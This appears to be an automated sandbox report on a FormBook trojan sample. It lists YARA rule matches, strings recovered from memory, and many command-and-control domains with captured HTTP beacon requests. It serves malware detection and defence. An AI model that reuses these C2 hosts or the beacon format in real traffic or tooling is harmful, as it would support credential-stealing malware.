69 76 65 65 78 63 65 6c 6c 65 6e 63 65 2e 63 6f 6d 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0d 0a Data Ascii: 148<html><head><title>This domain is registered - incentiveexcellence.com</title></head><frameset rows="35,*"><frame scrolling="no" frameborder="0" src="http://redirect.aaaq.com/header.html"><frame scrolling="auto" frameborder="0" src="http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com"></frameset></html>
          Source: YSpCB8DEek.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://redirect.aaaq.com/header.html
          Source: explorer.exe, 00000003.00000002.589685379.00000000159BF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000004.00000002.577071198.000000000509F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com
          Source: explorer.exe, 00000003.00000002.572601902.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.335123598.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321913311.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586876911.000000000ED28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dietoll-official.site
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dietoll-official.site/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dietoll-official.site/nes8/www.hallmarklog.live
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dietoll-official.siteReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enakslot.net
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enakslot.net/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enakslot.net/nes8/www.wordybag.online
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.enakslot.netReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hadafsazan.net
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hadafsazan.net/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hadafsazan.net/nes8/www.naturetechvr.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hadafsazan.netReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hallmarklog.live
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hallmarklog.live/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hallmarklog.live/nes8/www.n7m.tokyo
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hallmarklog.liveReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.com/nes8/www.purityrecruitment.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.incentiveexcellence.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.com/nes8/www.yaxin376.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.innovativanimal.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.com/nes8/www.hadafsazan.net
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jinglunqhd.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shop
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shop/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shop/nes8/www.incentiveexcellence.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linnus.shopReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.info
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.info/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.info/nes8/www.prvtg.top
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.marketproinv.infoReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyo
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyo/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyo/nes8/www.jinglunqhd.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.n7m.tokyoReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naturetechvr.com
          Source: explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naturetechvr.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.naturetechvr.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.top
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.top/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.top/nes8/www.innovativanimal.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.prvtg.topReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.com/nes8/www.marketproinv.info
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.purityrecruitment.comReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.tech
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.tech/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.tech/nes8/www.linnus.shop
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.swegon.techReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.online
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.online/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.online/nes8/www.dietoll-official.site
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wordybag.onlineReferer:
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.com
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.com/nes8/
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.com/nes8/www.enakslot.net
          Source: explorer.exe, 00000003.00000003.533044380.000000000ED62000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.586920774.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.547053990.000000000ED69000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yaxin376.comReferer:
          Source: unknownDNS traffic detected: queries for: www.swegon.tech
          Source: global trafficHTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1Host: www.swegon.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6 HTTP/1.1Host: www.swegon.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp HTTP/1.1Host: www.linnus.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3 HTTP/1.1Host: www.incentiveexcellence.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: afhjjq.exe, 00000001.00000002.318596123.0000000000FBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
